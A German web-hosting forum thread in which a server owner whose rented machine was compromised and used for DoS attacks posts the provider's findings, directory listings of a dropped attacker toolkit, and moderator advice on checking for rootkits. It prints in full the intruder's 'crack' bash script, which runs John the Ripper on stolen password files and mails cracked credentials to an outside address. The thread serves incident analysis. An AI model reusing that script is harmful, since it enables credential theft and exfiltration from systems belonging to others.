S4Y Server fristlos gekündigt ?!
- Thread starter abi
- Start date
W
WDZaphod
Guest
Hai!
Ich hab heute auch diese Mail bekommen - Kiste wurde disconnected.
Laut S4Y waren 3 Server betroffen, u.a. meiner. Hab das Fax abgeschickt, von wegen "wieder online nehmen ohne Reinstall", und per Hotline (Platinum Support, ein Glück...) den Auftrag gegeben, die halbe Stunde, die ich im Monat frei habe, für eine Fehlersuche zu verwenden.
Mein (2-Jahres-)Vertrag läuft im April aus, ebenfalls Premium-Buy.
Wenn ich Neuigkeiten habe, was wie kompromittiert wurde, sag ich bescheid. Wenn einer der anderen beiden weiß, was los war, bitte das gleiche tun!
Sh*t, die Kiste läuft seit fast 2 Jahren problemlos. Und nun wird davon eine DOS-Attacke gefahren, und das trotz deaktiviertem root-login UND key-Auth. Was das nur war?
Ich hab heute auch diese Mail bekommen - Kiste wurde disconnected.
Laut S4Y waren 3 Server betroffen, u.a. meiner. Hab das Fax abgeschickt, von wegen "wieder online nehmen ohne Reinstall", und per Hotline (Platinum Support, ein Glück...) den Auftrag gegeben, die halbe Stunde, die ich im Monat frei habe, für eine Fehlersuche zu verwenden.
Mein (2-Jahres-)Vertrag läuft im April aus, ebenfalls Premium-Buy.
Wenn ich Neuigkeiten habe, was wie kompromittiert wurde, sag ich bescheid. Wenn einer der anderen beiden weiß, was los war, bitte das gleiche tun!
Sh*t, die Kiste läuft seit fast 2 Jahren problemlos. Und nun wird davon eine DOS-Attacke gefahren, und das trotz deaktiviertem root-login UND key-Auth. Was das nur war?
LinuxAdmin
Moderator
Wenn Du auch nur ein halbwegs sicheres Root-Passwort hast, kommen 99,8% der Eindringlinge nicht über die ssh rein. Die Brute-Force-Attacken dauern schlichtweg viel zu lange....
Wenn ich in einen Server einbrechen wollte, würde ich mich als Erstes bei den installierten PHP-Scripten umschauen -- da hat man als Cracker deutlich bessere Chancen, rein zu kommen.
Viele Grüße,
LinuxAdmin
W
WDZaphod
Guest
root ist sowieso deaktiviert (Login), und hat als Systemuser was 12-Stelliges mit Sonderzeichen, was in keiner Cracklib steht. SSH halte ich auch für ziemlich unwahrscheinlich.
Ich hab nur ein Problem: Auf dem Server ist das Forum eines Bekannten, welcher vor ein paar Wochen verstorben ist. Bei seinem Account ist OpenBasedir und Safemode=Off - das könnte ein Fehler gewesen sein.
Ich hoffe, die S4Yler teilen mir wenigstens mit, wo sich das Loch befand. Die Sache zu flicken wird dann natürlich noch ein weiteres Problem, da mir der Boardersteller nicht mehr für Fragen zur Verfügung steht
Ich hab nur ein Problem: Auf dem Server ist das Forum eines Bekannten, welcher vor ein paar Wochen verstorben ist. Bei seinem Account ist OpenBasedir und Safemode=Off - das könnte ein Fehler gewesen sein.
Ich hoffe, die S4Yler teilen mir wenigstens mit, wo sich das Loch befand. Die Sache zu flicken wird dann natürlich noch ein weiteres Problem, da mir der Boardersteller nicht mehr für Fragen zur Verfügung steht
W
WDZaphod
Guest
Hui, das ging schnell!
==============================================
================================================================
Ticketsystem
================================================================
nach einer kurzen Überprüfung muss ich Ihnen mitteilen das Ihr Server höc=
hstwahrscheinlich über den apache Webserverdienst kompromittiert wurde. Im Verzeichnis /tmp fand ich einige Ordner und Dateien die für DoS Angriffe verwendet werden.
drwxr-xr-x 3 www-data www-data 4096 2006-02-07 04:00 .fl
drwxr-xr-x 3 www-data www-data 4096 2006-02-07 04:00 .
drwxrwxrwt 11 root root 4096 2007-12-10 10:38 ..
-rwxr-xr-x 1 www-data www-data 8922 2006-01-24 07:18 b
-rwxr-xr-x 1 www-data www-data 19557 2005-05-10 06:50 b2
-rw-r--r-- 1 www-data www-data 266463 2005-05-10 06:50 bang.txt
drwxr-xr-x 2 www-data www-data 4096 2006-01-24 16:42 c
-rwxr-xr-x 1 www-data www-data 8687 2006-01-24 08:12 f
-rwxr-xr-x 1 www-data www-data 14679 2005-11-03 07:28 f4
-rwxr-xr-x 1 www-data www-data 10848 2005-05-29 22:16 j
-rwxr-xr-x 1 www-data www-data 13850 2005-05-29 22:23 j2
-rwxr-xr-x 1 www-data www-data 15078 2005-02-20 18:51 s
-rwxr-xr-x 1 www-data www-data 16776 2002-09-19 07:59 sl
-rwxr-xr-x 1 www-data www-data 15195 2004-09-02 20:34 std
-rwxr-xr-x 1 www-data www-data 8790 2006-01-24 07:39 stream
-rwxr-xr-x 1 www-data www-data 7091 2006-01-24 07:25 tty
-rwxr-xr-x 1 www-data www-data 13687 2002-11-20 06:27 v
-rwxr-xr-x 1 www-data www-data 14841 2005-07-22 17:42 v2
-rwxr-xr-x 1 www-data www-data 915 2005-03-02 07:59 x
-rwxr-xr-x 1 www-data www-data 11629 2005-11-03 07:28 z
Ich habe diese Daten einmal aus dem Ordner entfernt damit beim booten in =
den normalen Modus diese nicht wieder aktiv werden.
Anhand des Besitzernamens www-data erkennen Sie das die Kompromittierung =
über ein unsichers Webformular kam. Allerdings ist es sehr schwierig zu sagen von welchem.
Ich habe den Server erstmal im Recovery Mode belassen, falls Sie
nochmal nachsehen möchten. Das root Passwort lautet: *****
===================================================
Mist....
Heut Abend erst mal wieder basteln....
==============================================
================================================================
Ticketsystem
================================================================
nach einer kurzen Überprüfung muss ich Ihnen mitteilen das Ihr Server höc=
hstwahrscheinlich über den apache Webserverdienst kompromittiert wurde. Im Verzeichnis /tmp fand ich einige Ordner und Dateien die für DoS Angriffe verwendet werden.
drwxr-xr-x 3 www-data www-data 4096 2006-02-07 04:00 .fl
drwxr-xr-x 3 www-data www-data 4096 2006-02-07 04:00 .
drwxrwxrwt 11 root root 4096 2007-12-10 10:38 ..
-rwxr-xr-x 1 www-data www-data 8922 2006-01-24 07:18 b
-rwxr-xr-x 1 www-data www-data 19557 2005-05-10 06:50 b2
-rw-r--r-- 1 www-data www-data 266463 2005-05-10 06:50 bang.txt
drwxr-xr-x 2 www-data www-data 4096 2006-01-24 16:42 c
-rwxr-xr-x 1 www-data www-data 8687 2006-01-24 08:12 f
-rwxr-xr-x 1 www-data www-data 14679 2005-11-03 07:28 f4
-rwxr-xr-x 1 www-data www-data 10848 2005-05-29 22:16 j
-rwxr-xr-x 1 www-data www-data 13850 2005-05-29 22:23 j2
-rwxr-xr-x 1 www-data www-data 15078 2005-02-20 18:51 s
-rwxr-xr-x 1 www-data www-data 16776 2002-09-19 07:59 sl
-rwxr-xr-x 1 www-data www-data 15195 2004-09-02 20:34 std
-rwxr-xr-x 1 www-data www-data 8790 2006-01-24 07:39 stream
-rwxr-xr-x 1 www-data www-data 7091 2006-01-24 07:25 tty
-rwxr-xr-x 1 www-data www-data 13687 2002-11-20 06:27 v
-rwxr-xr-x 1 www-data www-data 14841 2005-07-22 17:42 v2
-rwxr-xr-x 1 www-data www-data 915 2005-03-02 07:59 x
-rwxr-xr-x 1 www-data www-data 11629 2005-11-03 07:28 z
Ich habe diese Daten einmal aus dem Ordner entfernt damit beim booten in =
den normalen Modus diese nicht wieder aktiv werden.
Anhand des Besitzernamens www-data erkennen Sie das die Kompromittierung =
über ein unsichers Webformular kam. Allerdings ist es sehr schwierig zu sagen von welchem.
Ich habe den Server erstmal im Recovery Mode belassen, falls Sie
nochmal nachsehen möchten. Das root Passwort lautet: *****
===================================================
Mist....
Heut Abend erst mal wieder basteln....
Die Timestamps könnten aber auch manuell gesetzt worden sein, oder die Dateien wurden aus einem Archiv ausgepackt. und das Datum beibehalten. Ich würde da nicht allzu viel auf die Timestamps geben.
Ist aber evtl. 'ne gute Idee, wenn man nach Dateien sucht, die dem www-data gehören, im gesamten System.
Ist aber evtl. 'ne gute Idee, wenn man nach Dateien sucht, die dem www-data gehören, im gesamten System.
W
WDZaphod
Guest
Hmmm...
Ich hab im ersten Step wieder überall den safe-mode und open-basedir dichtgemacht. Das war bei ein paar Domains offen.
Ist register-globals=on ein nennenswertes Sicherheitsloch?
Heute Abend schaue ich mal nach, was alles für Dateien mit dem Besitzer www-data herumfliegen - bis dahin werde ich mal die Apatschenlogs durchforsten...
Wie läuft so ein Angriff überhaupt? Zuerst muß ja mal etwas auf das Filesystem gelangen. Am einfachsten per Upload in z.B. einer Forensoftware. Wie bekommt man das dann gestartet? Und: die Dateien hatten den Besitzer www-data. Ich hätte erwartet, daß der owner einer der SysCP-User ist (10002:10002 z.B.). Unt er dem User hätte man das Zeug aber sicher auch starten können, daher: Wie verhindert man das?
Grüße!
Ich hab im ersten Step wieder überall den safe-mode und open-basedir dichtgemacht. Das war bei ein paar Domains offen.
Ist register-globals=on ein nennenswertes Sicherheitsloch?
Heute Abend schaue ich mal nach, was alles für Dateien mit dem Besitzer www-data herumfliegen - bis dahin werde ich mal die Apatschenlogs durchforsten...
Wie läuft so ein Angriff überhaupt? Zuerst muß ja mal etwas auf das Filesystem gelangen. Am einfachsten per Upload in z.B. einer Forensoftware. Wie bekommt man das dann gestartet? Und: die Dateien hatten den Besitzer www-data. Ich hätte erwartet, daß der owner einer der SysCP-User ist (10002:10002 z.B.). Unt er dem User hätte man das Zeug aber sicher auch starten können, daher: Wie verhindert man das?
Grüße!
JA! *10 Zeichen*
W
WDZaphod
Guest
Grmpf! Aber ohne register globals geht doch keine variablenübergabe in der URL, á la
xxx.php?dies=das&selles=jenes ?
xxx.php?dies=das&selles=jenes ?
W
WDZaphod
Guest
Hm, ich sollte mich auf mein Schaffensgebiet konzentrieren - OS-Administration. Foren installieren ist ja noch ok, aber wenns tiefer in php&Co geht, wirds dünn. Daher werde ich die Sicherheitseinstellungen vom Apachen besser nicht mehr ändern, und wenn ich mal selbst was stricke (selten), dann wird solange probiert, bis es ohne Server-Änderungen geht.
Quasi die Page dem Server anpassen, und nicht umgekehrt
Quasi die Page dem Server anpassen, und nicht umgekehrt
LinuxAdmin
Moderator
Das ist eine gute Idee -- die allerdings nicht ausreichend ist. Du musst noch sicherstellen, dass der Einbrecher keine lokalen Sicherheitslücken ausgenutzt hat, durch die er root-Rechte erlangen konnte.
Falls das der Fall gewesen ist, können die Dateien jedem beliebigen Benutzer gehören... Normalerweise werden dabei auch noch verschiedene Systemprogramme ausgetauscht, die dafür sorgen, dass Du diese Dateien während des laufenden Betriebs nicht finden kannst! Daher solltest Du die md5sums sämtlicher Dateien mit einer Version vergleichen, von der Du weißt, das sie "sauber" sind, während das System noch in der Rescue-Console läuft (von der Du ausgehst, dass sie nicht kompromittiert wurde -- bei einem "normalen" Rechner würde man dafür von CD booten).
Viele Grüße,
LinuxAdmin
W
WDZaphod
Guest
Den chkrootkit hab ich schon laufenlassen - alles clean. Die Frage ist nur, ob das eine halbwechs verläßliche Aussage ist
Grrr, im April hätte ich eh einen neuen Rechner bekommen, hätten die Ochsen nicht bis März damit warten können?
Danke aber für die Tips!
Grrr, im April hätte ich eh einen neuen Rechner bekommen, hätten die Ochsen nicht bis März damit warten können?
Danke aber für die Tips!
traced
Registered User
Quasi die Page dem Server anpassen, und nicht umgekehrt
Da zeigt sich auch wer "safemode konform" proggen kann
W
WDZaphod
Guest
HaiIchNochmal!
Update: Ich hab das Passwort vom www-data geändert.
Im /tmp habe ich schon wieder was gefunden:
Ich habe kein webmin auf dem Ding drauf!
in diesem Ordner ist folgendes:
Update: Ich hab das Passwort vom www-data geändert.
Im /tmp habe ich schon wieder was gefunden:
Code:
echo566:/tmp# ls -lash
insgesamt 40K
4,0K drwxr-xr-x 7 root root 4,0K 2007-12-11 21:55 .
4,0K drwxr-xr-x 22 root root 4,0K 2007-12-11 21:52 ..
4,0K drwxrwxrwt 2 root root 4,0K 2007-12-10 19:25 .ICE-unix
4,0K drwx------ 2 root root 4,0K 2007-12-10 19:28 mc-root
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-12-11 17:47 .p
[B]4,0K drwxr-xr-x 3 www-data www-data 4,0K 2007-12-11 21:46 webmin[/B]
4,0K drwxrwxrwt 2 root root 4,0K 2007-12-10 19:25 .X11-unixin diesem Ordner ist folgendes:
Code:
echo790:/tmp/webmin# ls -lash
insgesamt 3,4M
4,0K drwxr-xr-x 4 www-data www-data 4,0K 2007-12-11 22:02 .
4,0K drwxr-xr-x 7 root root 4,0K 2007-12-11 21:55 ..
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .0.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .100.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .101.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .102.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .103.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .10.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .11.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .12.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .13.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .14.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .15.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .16.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .17.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .18.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .19.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .1.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .20.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .21.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .22.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .23.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .24.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .25.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .26.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .27.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .28.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .29.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .2.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .30.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .31.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .32.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .33.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .34.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .35.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .36.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .37.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .38.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .39.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .3.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .40.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .41.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .42.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .43.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .44.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .45.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .46.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .47.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .48.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .49.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .4.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .50.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .51.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .52.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .53.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .54.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .55.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .56.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .57.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .58.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .59.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .5.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .60.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .61.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .62.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .63.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .64.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .65.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .66.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .67.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .68.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .69.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .6.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .70.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .71.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .72.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .73.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .74.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .75.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .76.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .77.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .78.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .79.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .7.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .80.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .81.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .82.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .83.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .84.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .85.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .86.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .87.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .88.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .89.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .8.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .90.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .91.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .92.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .93.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .94.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .95.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .96.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .97.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .98.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .99.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .9.pscan.10000
4,0K -rwxr-xr-x 1 www-data www-data 1,1K 2006-09-26 01:17 a
4,0K -rwxr-xr-x 1 www-data www-data 264 2006-09-23 03:47 auto
4,0K -rw-r--r-- 1 www-data www-data 3,5K 2007-12-11 17:58 crack
2,2M -rwxr-xr-x 1 www-data www-data 2,2M 2005-09-10 07:56 curl
4,0K -rwxr-xr-x 1 www-data www-data 1,5K 2006-09-24 07:25 getpasswd
4,0K -rwxr-xr-x 1 www-data www-data 1,5K 2006-09-24 07:26 getshadow
196K -rwxr-xr-x 1 www-data www-data 192K 2006-09-23 00:19 john
16K -rw------- 1 www-data www-data 15K 2006-05-26 00:56 john.conf
4,0K -rwxr-xr-x 1 www-data www-data 3,0K 2007-03-03 16:02 mass
4,0K -rwxr-xr-x 1 www-data www-data 3,4K 2007-12-11 18:21 run
4,0K -rw-r--r-- 1 www-data www-data 3,9K 2007-12-11 18:22 run.log
20K -rwxr-xr-x 1 www-data www-data 19K 2005-09-10 07:56 scan
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-12-11 22:02 scan_87.118
792K -rwxr-xr-x 1 www-data www-data 786K 2005-09-10 07:56 src.tgz
4,0K -rwxr-xr-x 1 www-data www-data 1,1K 2007-03-03 16:05 start
4,0K -rw-r--r-- 1 www-data www-data 3,2K 2007-12-11 21:58 uniq_87.118.txt
184K -rwxr-xr-x 1 www-data www-data 178K 2005-09-10 07:56 unshadow
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-03-03 15:43 words
Last edited by a moderator:
W
WDZaphod
Guest
Im Ordner "words" sind wordlists in verschiedenen Sprachen...
Die Datei "crack" sieht so aus:
Die Datei "crack" sieht so aus:
Code:
/tmp/webmin# cat crack
#!/bin/bash
only_crack_root_accounts=0
crack_blowfish=0
use_small=1
alert=1
address=simplu_cry@yahoo.com
if [ $# != "2" ]
then
echo "# usage: $0 211.111 <passfile>"
echo "# dir scan_211.111/ must exist."
exit;
fi
echo "# let's see what john the ripper has to say about $1.*"
if [ $only_crack_root_accounts -eq 0 ]; then
./john -se=$1_DES_session -w=$2 -fo=DES --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $use_small -eq 0 ]; then
./john -se=$1_MD5_session -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
fi
else
echo "# using $2 for the MD5/BF hashes..."
./john -se=$1_MD5_session -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
fi
fi
else
./john -se=$1_DES_session_uid0 -w=$2 -fo=DES --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $use_small -eq 0]; then
./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
fi
else
echo "# ./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*"
./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
echo "# ./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*"
./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
fi
fi
fi
echo "# updating the files in scan_$1/.."
cd scan_$1
find . -type f > ../lista.txt
for elem in $(cat ../lista.txt); do
echo -n "#"
../john -show $elem >> $elem
echo $elem >> ../status_$1
../john -show $elem >> ../status_$1
echo "-------------------------------------" >> ../status_$1
done
echo "# check status_$1 and the dir scan_$1/ "
rm -f ../lista.txt &>/dev/null
if [ $alert -eq 1 ]; then
un=`uname -n`
mail -s "$un is done." $address < ../status_$1
echo "--------Esti Rau Ma Soarece-------"
mail -s "$un is done." [email]simplu_cry@yahoo.com[/email] < ../status_$1
fi
echo gata
Last edited by a moderator: